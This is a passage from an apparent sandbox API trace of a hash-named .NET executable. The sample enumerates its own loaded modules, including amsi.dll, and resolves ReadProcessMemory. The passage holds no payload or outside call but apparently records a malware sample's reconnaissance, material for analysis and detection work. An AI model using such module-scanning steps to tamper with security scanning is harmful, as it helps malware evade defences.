hProcess=0x32c, hModule=0x764d0000, lpFilename=0x6b7af0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\psapi.dll" (normalized: "c:\\windows\\syswow64\\psapi.dll")) returned 0x1d [0109.095] GetModuleInformation (in: hProcess=0x32c, hModule=0x71560000, lpmodinfo=0x23f1af4, cb=0xc | out: lpmodinfo=0x23f1af4*(lpBaseOfDll=0x71560000, SizeOfImage=0x1b000, EntryPoint=0x71569050)) returned 1 [0109.096] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x71560000, lpBaseName=0x6b7af0, nSize=0x800 | out: lpBaseName="bcrypt.dll") returned 0xa [0109.096] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x71560000, lpFilename=0x6b7af0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll")) returned 0x1e [0109.097] GetModuleInformation (in: hProcess=0x32c, hModule=0x74eb0000, lpmodinfo=0x23f3c00, cb=0xc | out: lpmodinfo=0x23f3c00*(lpBaseOfDll=0x74eb0000, SizeOfImage=0x13ff000, EntryPoint=0x7506b990)) returned 1 [0109.098] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x74eb0000, lpBaseName=0x6b7af0, nSize=0x800 | out: lpBaseName="shell32.dll") returned 0xb [0109.099] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x74eb0000, lpFilename=0x6b7af0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll")) returned 0x1f [0109.099] GetModuleInformation (in: hProcess=0x32c, hModule=0x76800000, lpmodinfo=0x23f5e18, cb=0xc | out: lpmodinfo=0x23f5e18*(lpBaseOfDll=0x76800000, SizeOfImage=0x37000, EntryPoint=0x76803b50)) returned 1 [0109.100] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x76800000, lpBaseName=0x6b7af0, nSize=0x800 | out: lpBaseName="cfgmgr32.dll") returned 0xc [0109.101] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x76800000, lpFilename=0x6b7af0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll")) returned 0x20 [0109.101] GetModuleInformation (in: hProcess=0x32c, hModule=0x745b0000, lpmodinfo=0x23f7f2c, cb=0xc | out: lpmodinfo=0x23f7f2c*(lpBaseOfDll=0x745b0000, SizeOfImage=0x4f9000, EntryPoint=0x747b7610)) returned 1 [0109.102] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x745b0000, lpBaseName=0x6b7af0, nSize=0x800 | out: lpBaseName="windows.storage.dll") returned 0x13 [0109.103] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x745b0000, lpFilename=0x6b7af0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll")) returned 0x27 [0109.104] GetModuleInformation (in: hProcess=0x32c, hModule=0x74520000, lpmodinfo=0x23fa058, cb=0xc | out: lpmodinfo=0x23fa058*(lpBaseOfDll=0x74520000, SizeOfImage=0x8d000, EntryPoint=0x74569b90)) returned 1 [0109.104] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x74520000, lpBaseName=0x6b7af0, nSize=0x800 | out: lpBaseName="shcore.dll") returned 0xa [0109.105] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x74520000, lpFilename=0x6b7af0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\shcore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll")) returned 0x1e [0109.106] GetModuleInformation (in: hProcess=0x32c, hModule=0x76470000, lpmodinfo=0x23fc164, cb=0xc | out: lpmodinfo=0x23fc164*(lpBaseOfDll=0x76470000, SizeOfImage=0x44000, EntryPoint=0x76477410)) returned 1 [0109.107] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x76470000, lpBaseName=0x6b7af0, nSize=0x800 | out: lpBaseName="powrprof.dll") returned 0xc [0109.107] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x76470000, lpFilename=0x6b7af0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll")) returned 0x20 [0109.108] GetModuleInformation (in: hProcess=0x32c, hModule=0x73f20000, lpmodinfo=0x23fe278, cb=0xc | out: lpmodinfo=0x23fe278*(lpBaseOfDll=0x73f20000, SizeOfImage=0xf000, EntryPoint=0x73f22e40)) returned 1 [0109.109] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x73f20000, lpBaseName=0x6b7af0, nSize=0x800 | out: lpBaseName="profapi.dll") returned 0xb [0109.110] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x73f20000, lpFilename=0x6b7af0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll")) returned 0x1f [0109.110] CloseHandle (hObject=0x32c) returned 1 [0109.111] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ReadProcessMemory", cchWideChar=17, lpMultiByteStr=0x19eac4, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ReadProcessMemory\x1a2\x02b\x84Hó(ú\x1bo@î\x19", lpUsedDefaultChar=0x0) returned 17 [0109.111] GetProcAddress (hModule=0x76720000, lpProcName="ReadProcessMemory") returned 0x76761c80 [0109.117] GetCurrentProcessId () returned 0x139c [0109.117] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x139c) returned 0x32c [0109.117] EnumProcessModules (in: hProcess=0x32c, lphModule=0x2402480, cb=0x100, lpcbNeeded=0x19eae0 | out: lphModule=0x2402480, lpcbNeeded=0x19eae0) returned 1 [0109.118] GetModuleInformation (in: hProcess=0x32c, hModule=0x400000, lpmodinfo=0x24025c0, cb=0xc | out: lpmodinfo=0x24025c0*(lpBaseOfDll=0x400000, SizeOfImage=0x178000, EntryPoint=0x0)) returned 1 [0109.118] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x400000, lpBaseName=0x6b7af0, nSize=0x800 | out: lpBaseName="08b3772f35997a0eb0894e7e58b4a324324de6121f557976909bdaa31a2c883e.exe") returned 0x44 [0109.118] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x400000, lpFilename=0x6b7af0, nSize=0x800 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\08b3772f35997a0eb0894e7e58b4a324324de6121f557976909bdaa31a2c883e.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\08b3772f35997a0eb0894e7e58b4a324324de6121f557976909bdaa31a2c883e.exe")) returned 0x62 [0109.119] GetModuleInformation (in: hProcess=0x32c, hModule=0x771d0000, lpmodinfo=0x24047e4, cb=0xc | out: lpmodinfo=0x24047e4*(lpBaseOfDll=0x771d0000, SizeOfImage=0x17b000, EntryPoint=0x0)) returned 1 [0109.119] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x771d0000, lpBaseName=0x6b7af0, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0109.119] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x771d0000, lpFilename=0x6b7af0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll")) returned 0x1d [0109.119] GetModuleInformation (in: hProcess=0x32c, hModule=0x6f8b0000, lpmodinfo=0x24068e8, cb=0xc | out: lpmodinfo=0x24068e8*(lpBaseOfDll=0x6f8b0000, SizeOfImage=0x59000, EntryPoint=0x6f8c0780)) returned 1 [0109.119] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x6f8b0000, lpBaseName=0x6b7af0, nSize=0x800 | out: lpBaseName="MSCOREE.DLL") returned 0xb [0109.120] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x6f8b0000, lpFilename=0x6b7af0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\MSCOREE.DLL" (normalized: "c:\\windows\\syswow64\\mscoree.dll")) returned 0x1f [0109.120] GetModuleInformation (in: hProcess=0x32c, hModule=0x76720000, lpmodinfo=0x24089f4, cb=0xc | out: lpmodinfo=0x24089f4*(lpBaseOfDll=0x76720000, SizeOfImage=0xe0000, EntryPoint=0x76733980)) returned 1 [0109.120] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x76720000, lpBaseName=0x6b7af0, nSize=0x800 | out: lpBaseName="KERNEL32.dll") returned 0xc [0109.120] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x76720000, lpFilename=0x6b7af0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\KERNEL32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")) returned 0x20 [0109.120] GetModuleInformation (in: hProcess=0x32c, hModule=0x76910000, lpmodinfo=0x240ab08, cb=0xc | out: lpmodinfo=0x240ab08*(lpBaseOfDll=0x76910000, SizeOfImage=0x17e000, EntryPoint=0x769c1b90)) returned 1 [0109.121] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x76910000, lpBaseName=0x6b7af0, nSize=0x800 | out: lpBaseName="KERNELBASE.dll") returned 0xe [0109.121] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x76910000, lpFilename=0x6b7af0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\KERNELBASE.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll")) returned 0x22 [0109.121] GetModuleInformation (in: hProcess=0x32c, hModule=0x73e50000, lpmodinfo=0x240cc50, cb=0xc | out: lpmodinfo=0x240cc50*(lpBaseOfDll=0x73e50000, SizeOfImage=0x92000, EntryPoint=0x73e90380)) returned 1 [0109.121] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x73e50000, lpBaseName=0x6b7af0, nSize=0x800 | out: lpBaseName="apphelp.dll") returned 0xb [0109.121] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x73e50000, lpFilename=0x6b7af0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll")) returned 0x1f [0109.122] GetModuleInformation (in: hProcess=0x32c, hModule=0x76600000, lpmodinfo=0x240ed5c, cb=0xc | out: lpmodinfo=0x240ed5c*(lpBaseOfDll=0x76600000, SizeOfImage=0x7b000, EntryPoint=0x7661e970)) returned 1 [0109.122] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x76600000, lpBaseName=0x6b7af0, nSize=0x800 | out: lpBaseName="ADVAPI32.dll") returned 0xc [0109.122] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x76600000, lpFilename=0x6b7af0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ADVAPI32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll")) returned 0x20 [0109.122] GetModuleInformation (in: hProcess=0x32c, hModule=0x76a90000, lpmodinfo=0x2410e70, cb=0xc | out: lpmodinfo=0x2410e70*(lpBaseOfDll=0x76a90000, SizeOfImage=0xbe000, EntryPoint=0x76ac5630)) returned 1 [0109.123] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x76a90000, lpBaseName=0x6b7af0, nSize=0x800 | out: lpBaseName="msvcrt.dll") returned 0xa [0109.123] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x76a90000, lpFilename=0x6b7af0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll")) returned 0x1e [0109.123] GetModuleInformation (in: hProcess=0x32c, hModule=0x76cb0000, lpmodinfo=0x2412f7c, cb=0xc | out: lpmodinfo=0x2412f7c*(lpBaseOfDll=0x76cb0000, SizeOfImage=0x44000, EntryPoint=0x76cc9d80)) returned 1 [0109.123] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x76cb0000, lpBaseName=0x6b7af0, nSize=0x800 | out: lpBaseName="sechost.dll") returned 0xb [0109.124] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x76cb0000, lpFilename=0x6b7af0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll")) returned 0x1f [0109.124] GetModuleInformation (in: hProcess=0x32c, hModule=0x76c00000, lpmodinfo=0x24150d4, cb=0xc | out: lpmodinfo=0x24150d4*(lpBaseOfDll=0x76c00000, SizeOfImage=0xad000, EntryPoint=0x76c14f00)) returned 1 [0109.124] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x76c00000, lpBaseName=0x6b7af0, nSize=0x800 | out: lpBaseName="RPCRT4.dll") returned 0xa [0109.125] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x76c00000, lpFilename=0x6b7af0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\RPCRT4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll")) returned 0x1e [0109.125] GetModuleInformation (in: hProcess=0x32c, hModule=0x73f00000, lpmodinfo=0x24171e0, cb=0xc | out: lpmodinfo=0x24171e0*(lpBaseOfDll=0x73f00000, SizeOfImage=0x1e000, EntryPoint=0x73f0b640)) returned 1 [0109.125] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x73f00000, lpBaseName=0x6b7af0, nSize=0x800 | out: lpBaseName="SspiCli.dll") returned 0xb [0109.126] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x73f00000, lpFilename=0x6b7af0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\SspiCli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll")) returned 0x1f [0109.126] GetModuleInformation (in: hProcess=0x32c, hModule=0x73ef0000, lpmodinfo=0x24192ec, cb=0xc | out: lpmodinfo=0x24192ec*(lpBaseOfDll=0x73ef0000, SizeOfImage=0xa000, EntryPoint=0x73ef2a00)) returned 1 [0109.126] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x73ef0000, lpBaseName=0x6b7af0, nSize=0x800 | out: lpBaseName="CRYPTBASE.dll") returned 0xd [0109.127] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x73ef0000, lpFilename=0x6b7af0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\CRYPTBASE.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll")) returned 0x21 [0109.127] GetModuleInformation (in: hProcess=0x32c, hModule=0x76840000, lpmodinfo=0x241b400, cb=0xc | out: lpmodinfo=0x241b400*(lpBaseOfDll=0x76840000, SizeOfImage=0x58000, EntryPoint=0x768825c0)) returned 1 [0109.127] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x76840000, lpBaseName=0x6b7af0, nSize=0x800 | out: lpBaseName="bcryptPrimitives.dll") returned 0x14 [0109.128] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x76840000, lpFilename=0x6b7af0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\bcryptPrimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll")) returned 0x28 [0109.128] GetModuleInformation (in: hProcess=0x32c, hModule=0x6f910000, lpmodinfo=0x241d534, cb=0xc | out: lpmodinfo=0x241d534*(lpBaseOfDll=0x6f910000, SizeOfImage=0x7d000, EntryPoint=0x6f920db0)) returned 1 [0109.128] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x6f910000, lpBaseName=0x6b7af0, nSize=0x800 | out: lpBaseName="mscoreei.dll") returned 0xc [0109.129] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x6f910000, lpFilename=0x6b7af0, nSize=0x800 | out: lpFilename="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\mscoreei.dll")) returned 0x3a [0109.129] GetModuleInformation (in: hProcess=0x32c, hModule=0x76d00000, lpmodinfo=0x241f67c, cb=0xc | out: lpmodinfo=0x241f67c*(lpBaseOfDll=0x76d00000, SizeOfImage=0x45000, EntryPoint=0x76d1de90)) returned 1 [0109.129] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x76d00000, lpBaseName=0x6b7af0, nSize=0x800 | out: lpBaseName="SHLWAPI.dll") returned 0xb [0109.131] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x76d00000, lpFilename=0x6b7af0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\SHLWAPI.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll")) returned 0x1f [0109.132] GetModuleInformation (in: hProcess=0x32c, hModule=0x762b0000, lpmodinfo=0x2421788, cb=0xc | out: lpmodinfo=0x2421788*(lpBaseOfDll=0x762b0000, SizeOfImage=0x1bd000, EntryPoint=0x76392a10)) returned 1 [0109.132] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x762b0000, lpBaseName=0x6b7af0, nSize=0x800 | out: lpBaseName="combase.dll") returned 0xb [0109.133] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x762b0000, lpFilename=0x6b7af0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll")) returned 0x1f [0109.133] GetModuleInformation (in: hProcess=0x32c, hModule=0x74ab0000, lpmodinfo=0x2423894, cb=0xc | out: lpmodinfo=0x2423894*(lpBaseOfDll=0x74ab0000, SizeOfImage=0x14f000, EntryPoint=0x74b66820)) returned 1 [0109.133] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x74ab0000, lpBaseName=0x6b7af0, nSize=0x800 | out: lpBaseName="GDI32.dll") returned 0x9 [0109.134] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x74ab0000, lpFilename=0x6b7af0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\GDI32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll")) returned 0x1d [0109.134] GetModuleInformation (in: hProcess=0x32c, hModule=0x743d0000, lpmodinfo=0x2425a24, cb=0xc | out: lpmodinfo=0x2425a24*(lpBaseOfDll=0x743d0000, SizeOfImage=0x147000, EntryPoint=0x743e1cf0)) returned 1 [0109.135] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x743d0000, lpBaseName=0x6b7af0, nSize=0x800 | out: lpBaseName="USER32.dll") returned 0xa [0109.135] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x743d0000, lpFilename=0x6b7af0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\USER32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll")) returned 0x1e [0109.136] GetModuleInformation (in: hProcess=0x32c, hModule=0x741b0000, lpmodinfo=0x2427b30, cb=0xc | out: lpmodinfo=0x2427b30*(lpBaseOfDll=0x741b0000, SizeOfImage=0x2b000, EntryPoint=0x741b5680)) returned 1 [0109.136] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x741b0000, lpBaseName=0x6b7af0, nSize=0x800 | out: lpBaseName="IMM32.DLL") returned 0x9 [0109.137] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x741b0000, lpFilename=0x6b7af0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\IMM32.DLL" (normalized: "c:\\windows\\syswow64\\imm32.dll")) returned 0x1d [0109.137] GetModuleInformation (in: hProcess=0x32c, hModule=0x76d50000, lpmodinfo=0x2429c34, cb=0xc | out: lpmodinfo=0x2429c34*(lpBaseOfDll=0x76d50000, SizeOfImage=0xc000, EntryPoint=0x76d53930)) returned 1 [0109.137] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x76d50000, lpBaseName=0x6b7af0, nSize=0x800 | out: lpBaseName="kernel.appcore.dll") returned 0x12 [0109.138] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x76d50000, lpFilename=0x6b7af0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll")) returned 0x26 [0109.138] GetModuleInformation (in: hProcess=0x32c, hModule=0x6f8a0000, lpmodinfo=0x242bd60, cb=0xc | out: lpmodinfo=0x242bd60*(lpBaseOfDll=0x6f8a0000, SizeOfImage=0x8000, EntryPoint=0x6f8a17b0)) returned 1 [0109.139] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x6f8a0000, lpBaseName=0x6b7af0, nSize=0x800 | out: lpBaseName="VERSION.dll") returned 0xb [0109.139] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x6f8a0000, lpFilename=0x6b7af0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\VERSION.dll" (normalized: "c:\\windows\\syswow64\\version.dll")) returned 0x1f [0109.140] GetModuleInformation (in: hProcess=0x32c, hModule=0x6f1b0000, lpmodinfo=0x242de6c, cb=0xc | out: lpmodinfo=0x242de6c*(lpBaseOfDll=0x6f1b0000, SizeOfImage=0x6e1000, EntryPoint=0x6f1dcd70)) returned 1 [0109.140] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x6f1b0000, lpBaseName=0x6b7af0, nSize=0x800 | out: lpBaseName="clr.dll") returned 0x7 [0109.141] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x6f1b0000, lpFilename=0x6b7af0, nSize=0x800 | out: lpFilename="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clr.dll")) returned 0x35 [0109.141] GetModuleInformation (in: hProcess=0x32c, hModule=0x6f0b0000, lpmodinfo=0x242ff9c, cb=0xc | out: lpmodinfo=0x242ff9c*(lpBaseOfDll=0x6f0b0000, SizeOfImage=0xf5000, EntryPoint=0x6f104160)) returned 1 [0109.142] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x6f0b0000, lpBaseName=0x6b7af0, nSize=0x800 | out: lpBaseName="MSVCR120_CLR0400.dll") returned 0x14 [0109.142] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x6f0b0000, lpFilename=0x6b7af0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\MSVCR120_CLR0400.dll" (normalized: "c:\\windows\\syswow64\\msvcr120_clr0400.dll")) returned 0x28 [0109.143] GetModuleInformation (in: hProcess=0x32c, hModule=0x6d400000, lpmodinfo=0x24320d0, cb=0xc | out: lpmodinfo=0x24320d0*(lpBaseOfDll=0x6d400000, SizeOfImage=0x12b2000, EntryPoint=0x0)) returned 1 [0109.143] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x6d400000, lpBaseName=0x6b7af0, nSize=0x800 | out: lpBaseName="mscorlib.ni.dll") returned 0xf [0109.144] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x6d400000, lpFilename=0x6b7af0, nSize=0x800 | out: lpFilename="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\7582400666d289c016013ad0f6e0e3e6\\mscorlib.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\mscorlib\\7582400666d289c016013ad0f6e0e3e6\\mscorlib.ni.dll")) returned 0x68 [0109.144] GetModuleInformation (in: hProcess=0x32c, hModule=0x74dc0000, lpmodinfo=0x2434278, cb=0xc | out: lpmodinfo=0x2434278*(lpBaseOfDll=0x74dc0000, SizeOfImage=0xeb000, EntryPoint=0x74dfd650)) returned 1 [0109.145] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x74dc0000, lpBaseName=0x6b7af0, nSize=0x800 | out: lpBaseName="ole32.dll") returned 0x9 [0109.146] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x74dc0000, lpFilename=0x6b7af0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll")) returned 0x1d [0109.146] GetModuleInformation (in: hProcess=0x32c, hModule=0x6f030000, lpmodinfo=0x243637c, cb=0xc | out: lpmodinfo=0x243637c*(lpBaseOfDll=0x6f030000, SizeOfImage=0x80000, EntryPoint=0x6f031180)) returned 1 [0109.147] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x6f030000, lpBaseName=0x6b7af0, nSize=0x800 | out: lpBaseName="clrjit.dll") returned 0xa [0109.147] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x6f030000, lpFilename=0x6b7af0, nSize=0x800 | out: lpFilename="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clrjit.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clrjit.dll")) returned 0x38 [0109.148] GetModuleInformation (in: hProcess=0x32c, hModule=0x76680000, lpmodinfo=0x24384bc, cb=0xc | out: lpmodinfo=0x24384bc*(lpBaseOfDll=0x76680000, SizeOfImage=0x92000, EntryPoint=0x766b8cf0)) returned 1 [0109.149] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x76680000, lpBaseName=0x6b7af0, nSize=0x800 | out: lpBaseName="OLEAUT32.dll") returned 0xc [0109.149] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x76680000, lpFilename=0x6b7af0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\OLEAUT32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll")) returned 0x20 [0109.150] GetModuleInformation (in: hProcess=0x32c, hModule=0x6ca30000, lpmodinfo=0x243a5d0, cb=0xc | out: lpmodinfo=0x243a5d0*(lpBaseOfDll=0x6ca30000, SizeOfImage=0x9cc000, EntryPoint=0x0)) returned 1 [0109.150] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x6ca30000, lpBaseName=0x6b7af0, nSize=0x800 | out: lpBaseName="System.ni.dll") returned 0xd [0109.151] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x6ca30000, lpFilename=0x6b7af0, nSize=0x800 | out: lpFilename="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System\\1be7a15b1f33bf22e4f53aaf45518c77\\System.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system\\1be7a15b1f33bf22e4f53aaf45518c77\\system.ni.dll")) returned 0x64 [0109.151] GetModuleInformation (in: hProcess=0x32c, hModule=0x6e900000, lpmodinfo=0x243c76c, cb=0xc | out: lpmodinfo=0x243c76c*(lpBaseOfDll=0x6e900000, SizeOfImage=0x721000, EntryPoint=0x0)) returned 1 [0109.152] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x6e900000, lpBaseName=0x6b7af0, nSize=0x800 | out: lpBaseName="System.Core.ni.dll") returned 0x12 [0109.153] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x6e900000, lpFilename=0x6b7af0, nSize=0x800 | out: lpFilename="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Core\\eb4cca4f06a15158c3f7e2c56516729b\\System.Core.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.core\\eb4cca4f06a15158c3f7e2c56516729b\\system.core.ni.dll")) returned 0x6e [0109.153] GetModuleInformation (in: hProcess=0x32c, hModule=0x6e8f0000, lpmodinfo=0x243e928, cb=0xc | out: lpmodinfo=0x243e928*(lpBaseOfDll=0x6e8f0000, SizeOfImage=0xd000, EntryPoint=0x6e8f63e0)) returned 1 [0109.154] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x6e8f0000, lpBaseName=0x6b7af0, nSize=0x800 | out: lpBaseName="amsi.dll") returned 0x8 [0109.154] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x6e8f0000, lpFilename=0x6b7af0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\amsi.dll" (normalized: "c:\\windows\\syswow64\\amsi.dll")) returned 0x1c [0109.155] GetModuleInformation (in: hProcess=0x32c, hModule=0x764d0000, lpmodinfo=0x2440a2c, cb=0xc | out: lpmodinfo=0x2440a2c*(lpBaseOfDll=0x764d0000, SizeOfImage=0x6000, EntryPoint=0x764d1460)) returned 1 [0109.156] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x764d0000, lpBaseName=0x6b7af0, nSize=0x800 | out: lpBaseName="psapi.dll") returned 0x9 [0109.156] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x764d0000, lpFilename=0x6b7af0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\psapi.dll" (normalized: "c:\\windows\\syswow64\\psapi.dll")) returned 0x1d [0109.157] GetModuleInformation (in: hProcess=0x32c, hModule=0x71560000, lpmodinfo=0x2442b30, cb=0xc | out: lpmodinfo=0x2442b30*(lpBaseOfDll=0x71560000, SizeOfImage=0x1b000, EntryPoint=0x71569050)) returned 1 [0109.158] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x71560000, lpBaseName=0x6b7af0, nSize=0x800 | out: lpBaseName="bcrypt.dll") returned 0xa [0109.158] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x71560000, lpFilename=0x6b7af0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll")) returned 0x1e [0109.159] GetModuleInformation (in: hProcess=0x32c, hModule=0x74eb0000, lpmodinfo=0x2444c3c, cb=0xc | out: lpmodinfo=0x2444c3c*(lpBaseOfDll=0x74eb0000, SizeOfImage=0x13ff000, EntryPoint=0x7506b990)) returned 1 [0109.160] 